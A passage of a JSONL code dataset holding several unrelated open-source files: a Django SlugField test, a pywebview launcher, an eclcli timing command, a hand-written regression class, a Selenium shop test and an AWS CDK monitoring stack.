{e}\")\n return\n","repo_name":"ChrisKimZHT/Todo-List-Backend","sub_path":"api/note/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"6306867375","text":"from django.test import TestCase\n\nfrom .models import BigS, UnicodeSlugField\n\n\nclass SlugFieldTests(TestCase):\n def test_slugfield_max_length(self):\n \"\"\"\n SlugField honors max_length.\n \"\"\"\n bs = BigS.objects.create(s=\"slug\" * 50)\n bs = BigS.objects.get(pk=bs.pk)\n self.assertEqual(bs.s, \"slug\" * 50)\n\n def test_slugfield_unicode_max_length(self):\n \"\"\"\n SlugField with allow_unicode=True honors max_length.\n \"\"\"\n bs = UnicodeSlugField.objects.create(s=\"你好你好\" * 50)\n bs = UnicodeSlugField.objects.get(pk=bs.pk)\n self.assertEqual(bs.s, \"你好你好\" * 50)\n","repo_name":"django/django","sub_path":"tests/model_fields/test_slugfield.py","file_name":"test_slugfield.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"2993798818","text":"# -*- coding: utf-8 -*-\n\nimport webview\nimport logging\nfrom pathlib import Path\n\napp_name = 'swallow'\nhome_path = Path.home() / f'.{app_name}'\nhome_path.mkdir(exist_ok=True)\n\nlog_file = home_path / 'out.log'\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y/%m/%d %H:%M:%S',\n filename=log_file.absolute()\n )\n\nfrom src.globals import gbl\n\nbase_dir = Path(__file__).parent\nlogging.info(f'swallow base dir:{base_dir}')\ngbl.base_dir = base_dir\n\nfrom src.api import Api, server\n\napi = Api(base_dir, home_path)\n\n\ndef on_closing():\n try:\n # close hugo preview process\n api.hugos.close_pre()\n logging.info('pywebview window is closing')\n except Exception as e:\n logging.warning(f'on closing fail:{e}')\n\n\nif __name__ == '__main__':\n window = webview.create_window(app_name, server, js_api=api, min_size=(1000, 600), width=1200, height=800,\n confirm_close=True)\n window.events.closed += on_closing\n api.window = window\n webview.start(debug=True)\n","repo_name":"rangwea/swallow-pywebview","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32839534335","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Timing Implementation\"\"\"\n\nfrom eclcli.common import command\n\n\nclass Timing(command.Lister):\n \"\"\"Show timing data\"\"\"\n\n def take_action(self, parsed_args):\n column_headers = (\n 'URL',\n 'Seconds',\n )\n\n results = []\n total = 0.0\n for url, td in self.app.timing_data:\n # NOTE(dtroyer): Take the long way here because total_seconds()\n # was added in py27.\n sec = (td.microseconds + (td.seconds + td.days *\n 86400) * 1e6) / 1e6\n total += sec\n results.append((url, sec))\n results.append(('Total', total))\n return (\n column_headers,\n results,\n )\n","repo_name":"nttcom/eclcli","sub_path":"eclcli/common/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"12544689385","text":"class MyRegression:\n def __init__(self):\n self.intercept_ = 0.0\n self.coef_ = []\n\n def fit(self, X, Y):\n for el in X:\n el.insert(0, 1)\n Y = self.transpose([Y])\n rez1 = self.transpose(X)\n rez2 = self.multiply(rez1, X)\n rez3 = self.inverse(rez2)\n rez4 = self.multiply(rez3, rez1)\n rez5 = self.multiply(rez4, Y)\n self.intercept_ = rez5[0][0]\n for r in rez5[1:]:\n self.coef_.append(r[0])\n\n def predict(self, inputs):\n result = []\n for input in inputs:\n sum = self.intercept_\n for x, coef in zip(input, self.coef_):\n sum += x * coef\n result.append(sum)\n return result\n\n\n def transpose(self, matrix):\n transpose = []\n for j in range(len(matrix[0])): # no columns\n line = []\n for i in range(len(matrix)): # no rows\n line.append(matrix[i][j])\n transpose.append(line)\n return transpose\n\n def minor(self, matrix, i, j):\n result = []\n for x in range(len(matrix)):\n if x != i:\n line = []\n for y in range(len(matrix[0])):\n if y != j:\n line.append(matrix[x][y])\n result.append(line)\n return result\n\n def determinant(self, matrix):\n if len(matrix) == 1:\n return matrix[0][0]\n\n if len(matrix) == 2:\n return matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0]\n\n det = 0.0\n for j in range(len(matrix)): # dezvoltam dupa prima linie\n det += matrix[0][j] * ((-1) ** j) * self.determinant(self.minor(matrix, 0, j))\n return det\n\n def inverse(self, matrix):\n if len(matrix) != len(matrix[0]):\n raise Exception(\"Different number of rows and columns!\")\n\n detMatrix = self.determinant(matrix)\n if detMatrix == 0:\n raise Exception(\"Matrix is not invertible!\")\n\n result = self.adj(matrix)\n for i in range(len(result)):\n for j in range(len(result)):\n result[i][j] /= detMatrix\n return result\n\n def adj(self, matrix):\n matrix = self.transpose(matrix)\n result = []\n for i in range(len(matrix)):\n line = []\n for j in range(len(matrix)):\n elem = ((-1) ** (i + j)) * self.determinant(self.minor(matrix, i, j))\n line.append(elem)\n result.append(line)\n return result\n\n def multiply(self, a, b):\n if len(a[0]) != len(b):\n raise Exception(\"Can not multiply these matrices!\")\n\n result = []\n for i in range(len(a)):\n result.append([0 for _ in range(len(b[0]))])\n\n for i in range(len(a)):\n for j in range(len(b[0])):\n for k in range(len(b)):\n result[i][j] += a[i][k] * b[k][j]\n return 
result\n\n","repo_name":"mariaruncan/ubb-second-year","sub_path":"sem4/AI/Lab/ai-lab7/myregression.py","file_name":"myregression.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27221931946","text":"import logging\nimport time\nimport allure\nfrom page.cart_page import CartPage\nfrom page.home_page import HomePage\nfrom page.index_page import IndexPage\nfrom page.order_page import OrderPage\nfrom page.order_pay_page import OrderPayPage\nfrom utils.driver_utils import DriverUtils\n\n\n@allure.feature('订单模块')\nclass TestOrder:\n\n def setup(self):\n self.driver = DriverUtils.get_driver()\n self.index_page = IndexPage(self.driver)\n self.cart_page = CartPage(self.driver)\n self.order_page = OrderPage(self.driver)\n self.order_pay_page = OrderPayPage(self.driver)\n self.home_page = HomePage(self.driver)\n self.driver.get('http://localhost/')\n\n def teardown(self):\n time.sleep(2)\n DriverUtils.quit_driver()\n\n def teardown_class(self):\n DriverUtils.set_driver_select(False)\n DriverUtils.get_driver().get_screenshot_as_file('./screenshot/tpshop.png')\n DriverUtils.quit_driver()\n\n @allure.story('购物车结算,订单提交成功')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_submit_order(self):\n self.index_page.click_my_cart_btn()\n self.cart_page.click_go_to_pay_btn()\n time.sleep(6)\n logging.info('wait 6s for page display')\n self.order_page.click_submit_order_btn()\n assert '订单提交成功,请您尽快付款!' == self.order_pay_page.get_tips_info()\n\n @allure.story('选择货到付款,支付成功')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_pay(self):\n self.index_page.click_my_order_link()\n self.index_page.switch_window()\n logging.info('switch to other window')\n self.home_page.click_to_be_pay_link()\n self.home_page.click_pay_btn()\n self.home_page.switch_window()\n logging.info('switch to other window')\n self.order_pay_page.click_arrived_pay()\n self.order_pay_page.click_pay_btn()\n time.sleep(3)\n logging.info('wait 3s for page display')\n assert '订单提交成功,我们将在第一时间给你发货!' 
== self.order_pay_page.get_tips_info()\n","repo_name":"YoungWeiHuan/tpshop_auto_test","sub_path":"scripts/test_order.py","file_name":"test_order.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3584288694","text":"from aws_cdk import (\n # Duration,\n # aws_sqs as sqs,\n Stack,\n aws_lambda as lambda_,\n RemovalPolicy,\n Duration,\n aws_events as events_,\n aws_events_targets as targets_,\n aws_s3 as s3,\n aws_s3_deployment as s3deploy,\n # aws_sqs as sqs,\n aws_sns_subscriptions as sns_subs_,\n aws_sns as sns_,\n aws_cloudwatch_actions as cw_actions,\n aws_dynamodb as dynamodb,\n aws_iam as iam_,\n aws_cloudwatch as cloudwatch,\n aws_cloudwatch_actions as cw_actions,\n aws_codedeploy as codedeploy,\n aws_apigateway as gateway,\n # aws_apigateway.Cors,\n \n)\nfrom constructs import Construct\nfrom s3_resources import s3_res\nimport os\nimport boto3\n# from gateway import Cors as cors_\n# from gateway import CorsOptions as corO_\n# from corO import OPTIONS\n\nclass Sprint5MubarizStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n # def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n # policy = \"CloudWatchFullAccess\"\n # role = self.create_lambda_role(policy)\n role = self.lambda_role() # Saving roles for lambda in iam_role\n \n \n dynamo_db = self.create_table(\"mubariz_table\",\"Timestamp\",\"Subject\") \n db_create_lambda = self.create_lambda('dynamo_lambda', './resources', 'dynamo_lambda.db_lambda_handler',role)\n db_create_lambda.apply_removal_policy(RemovalPolicy.DESTROY)\n \n #granting our dynamodblambda full access to our resources. 
\n dynamo_db.grant_full_access(db_create_lambda)\n\n \n #creating the lambda function for measuring our web health, and passing it the role to access our resources.\n WebHealthLambda = self.create_lambda('webHealthLambda', './resources', 'webHealthLambda.lambda_handler',role)\n WebHealthLambda.apply_removal_policy(RemovalPolicy.DESTROY)\n \n #creating parameters for rule to run, it binds our lambda function with the schedule for periodic invocation.\n #defining the schedule for our lambda function\n lambda_schedule = events_.Schedule.rate(Duration.minutes(1))\n lambda_target = targets_.LambdaFunction(WebHealthLambda) #creating the target for the lambda function.\n \n \n '''\n write parameters for rule function.\n \n '''\n \n rule = events_.Rule(self, \"webHealthInvocation\", \n description=\"Periodic Lambda\", \n schedule = lambda_schedule,\n enabled = True,\n targets = [lambda_target])\n\n \n #defining our s3 bucket.\n \n mak_bucket = s3.Bucket(self, \"mubariz-skipq-bucket-id\",\n # bucket_name = 'mubariz-s3-bucket',\n removal_policy = RemovalPolicy.DESTROY,\n auto_delete_objects = True, \n public_read_access=True)\n \n # SkipQVoyager\n #initializing s3 bucket with file having web urls\n s3deploy.BucketDeployment(self, \"voyager_skipq\", sources = [s3deploy.Source.asset('./s3_resources', exclude = ['**', '!s3_res.py'])],\n destination_bucket = mak_bucket)\n \n \n \n #extracting names of \n bucketName = mak_bucket.bucket_name\n tableName = dynamo_db.table_name\n # Adding Environment Variables\n WebHealthLambda.add_environment('bucketName', bucketName)\n db_create_lambda.add_environment('tableName', tableName)\n \n # creating an sns topic and then adding an email subscription to the sns topic\n \n # alarm is being binded by topic, which triggers email subscription and dblambdahandler \n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_sns.html\n my_topic = sns_.Topic(self, \"makTopic\")\n my_topicARN = my_topic.topic_arn #we will send this topic as envVAr to WHL as action in the alarm\n \n my_topic.add_subscription(\n sns_subs_.EmailSubscription(\"mubariz.khan.skipq@gmail.com\"))\n \n my_topic.add_subscription(\n sns_subs_.LambdaSubscription(db_create_lambda))\n \n \n for iterant in s3_res.URL_TO_MONITOR: \n \n ''' \n The dimensions for the metric.\n\n (dict) --\n\n A dimension is a name/value pair that is part of the identity of a metric.\n You can assign up to 10 dimensions to a metric. Because dimensions are part of the unique identifier for a metric,\n whenever you add a unique name/value pair to one of your metrics, you are creating a new variation of that metric.\n\n Name (string) --\n\n The name of the dimension. Dimension names must contain only ASCII characters \n and must include at least one non-whitespace character.\n\n Value (string) --\n\n The value of the dimension. 
Dimension values must contain only ASCII characters \n and must include at least one non-whitespace character.\n '''\n \n dimension = {'URL': iterant} \n \n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CREATING OUR METRICS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\n # creating metrics using cloudwatch.metric to access urls{to monitor}, namespace\n # avail_metric = cloudwatch.Metric(namespace=s3_res.URL_NAMESPACE, \n # metric_name =s3_res.URL_AVAIL_NAMESPACE, \n # dimensions_map = dimension,\n # period=Duration.minutes(1))\n \n \n \n \n \n # lat_metric = cloudwatch.Metric(namespace=s3_res.URL_NAMESPACE,\n # metric_name =s3_res.URL_LAT_NAMESPACE,\n # dimensions_map = dimension,\n # period=Duration.minutes(1))\n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CREATING OUR ALARMS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n # lat_alarm = cloudwatch.Alarm(self, \n # id='latency_alarm'+'_'+iterant, \n # metric=lat_metric, \n # threshold = s3_res.THRESHOLD_2,\n # evaluation_periods = 1,\n # comparison_operator=cloudwatch.ComparisonOperator.GREATER_THAN_THRESHOLD\n # )\n \n # avail_alarm = cloudwatch.Alarm(self,\n # id='avail_alarm'+'_'+iterant, \n # metric=avail_metric, \n # threshold = s3_res.THRESHOLD_1,\n # evaluation_periods = 1,\n # comparison_operator=cloudwatch.ComparisonOperator.LESS_THAN_THRESHOLD\n # )\n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Binding OUR ALARMS w/ Topics %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_cloudwatch_actions/SnsAction.html\n # lat_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n # avail_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n \n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_dynamodb.html\n \n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_sns_subscriptions.html -> \n # {down}\n # 
https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_sns_subscriptions/LambdaSubscription.html\n \n # create table here in stack as it is a resource\n # time_atm will be our primary key\n\n #we'll suscribe the lambda to this topic\n \n #memory and durations k alarms likhnay hain \n \n ''' \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% creating our failure dimensions %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n #Failure dimensions for web health lambda\n \n WHL_failure_dimensions = {'FunctionName' : WebHealthLambda.function_name}\n WHL_failure_invo_dimensions = {'FunctionName' : WebHealthLambda.function_name}\n\n\n #Failure dimensions for dynamo lambda \n dynamo_failureDimensions = {'FunctionName' : db_create_lambda.function_name}\n dynamo_failure_invoDimensions = {'FunctionName' : db_create_lambda.function_name}\n \n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% creating metrics of lambda duration & invocation %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% by call metric.invocations & metric.duration which %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% return a metric regarding invocation or duration on %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% basis of the function call. 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n invo_dynamo_metric = db_create_lambda.metric_invocations(\n dimensions_map = dynamo_failure_invoDimensions,\n period=Duration.minutes(5))\n \n dur_dynamo_metric = db_create_lambda.metric_duration(\n dimensions_map = dynamo_failureDimensions,\n period=Duration.minutes(5))\n \n invo_whl_metric = WebHealthLambda.metric_invocations(\n dimensions_map = WHL_failure_invo_dimensions,\n period=Duration.minutes(5))\n \n dur_whl_metric = WebHealthLambda.metric_duration(\n dimensions_map = WHL_failure_dimensions,\n period=Duration.minutes(5))\n \n \n # Duration & Invocation ALarms for Web Health Metric \n \n failure_alarm = cloudwatch.Alarm(self, \n id='WHLfirst_failure_alarm_duration', \n metric=dur_whl_metric, \n evaluation_periods = 1,\n threshold = 10000,#Duration.millis(2000),\n #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n comparison_operator = cloudwatch.ComparisonOperator.GREATER_THAN_THRESHOLD #\n )\n \n \n failure_invo_alarm =cloudwatch.Alarm(self, \n id='WHLfirst_failure_alarm_invo', \n metric=invo_whl_metric, \n evaluation_periods = 1,\n threshold = 1100,#Duration.millis(2000),\n #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n comparison_operator = cloudwatch.ComparisonOperator.LESS_THAN_THRESHOLD \n \n )\n \n \n #Duration & Invocation Alarms for Dyanmo Lambda \n \n \n Dynamofailure_invo_alarm = cloudwatch.Alarm(self, \n id='Dynamo_failure_alarm_invo', \n metric=invo_dynamo_metric, \n evaluation_periods = 1,\n threshold = 1000,#Duration.millis(2000),\n comparison_operator = cloudwatch.ComparisonOperator.LESS_THAN_THRESHOLD #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n \n )\n # Dynamofailure_invo_alarm \n Dynamofailure_duration_alarm = cloudwatch.Alarm(self, \n id='Dynamo_failure_alarm_dur', \n metric=dur_dynamo_metric, \n evaluation_periods = 1,\n threshold = 10000,#Duration.millis(2000),\n comparison_operator = cloudwatch.ComparisonOperator.GREATER_THAN_THRESHOLD #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n \n )\n \n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% creating Alias for Rollback %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n # alias (Alias) – Lambda Alias to shift traffic. \n #Updating the version of the alias will trigger a CodeDeploy deployment.\n # [disable-awslint:ref-via-interface] since we need to modify the alias CFN resource update policy\n \n \n whl_alias = lambda_.Alias(self, \"makLambdaAlias1\",\n alias_name=\"makcurrent_whl1\",\n version= WebHealthLambda.current_version #Returns a lambda.Version which represents the current version of this Lambda function. 
A new version will be created every time the function’s configuration changes.\n )\n \n dynamo_alias = lambda_.Alias(self, \"makDynamoLambdaAlias1\",\n alias_name=\"makcurrent_dynamo1\",\n version= db_create_lambda.current_version #Returns a lambda.Version which represents the current version of this Lambda function. A new version will be created every time the function’s configuration changes.\n )\n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Deployment Group %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n codedeploy.LambdaDeploymentGroup(self, \"whl_mak_id1\",\n alias=whl_alias,\n deployment_config=codedeploy.LambdaDeploymentConfig.LINEAR_10_PERCENT_EVERY_1_MINUTE,\n alarms=[failure_alarm, failure_invo_alarm\n ]\n )\n \n \n codedeploy.LambdaDeploymentGroup(self, \"dynamofailure_mak_id1\",\n alias=dynamo_alias,\n deployment_config=codedeploy.LambdaDeploymentConfig.LINEAR_10_PERCENT_EVERY_1_MINUTE,\n alarms=[Dynamofailure_invo_alarm,Dynamofailure_duration_alarm \n\n ]\n )\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Binding Failure Alarms with %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Simple Notification Service %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% To Genrate Emails %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n #Binding Failure Alarms with SNS\n \n Dynamofailure_invo_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n Dynamofailure_duration_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n failure_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n failure_invo_alarm.add_alarm_action(cw_actions.SnsAction(my_topic)) \n \n ''' \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Definining API %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n \n \n # Creating a table which'll shift data from s3 bucket to table and then we'll perform CRUD \n # operations on that table based the API\n #create lambda to shift data from bucket to DB?\n \n bucket_to_db = self.create_dbtable(\"mak_bucket_to_table\",'url') \n bktToDBHandler = self.create_lambda('makBucketToDB', './resources', 'BucketToDB.bucket_to_dbHandler',role)\n 
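# this handler is invoked on a schedule (see the rule below) to copy the\n        # monitored URLs from the S3 bucket into the DynamoDB table for the CRUD API\n        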
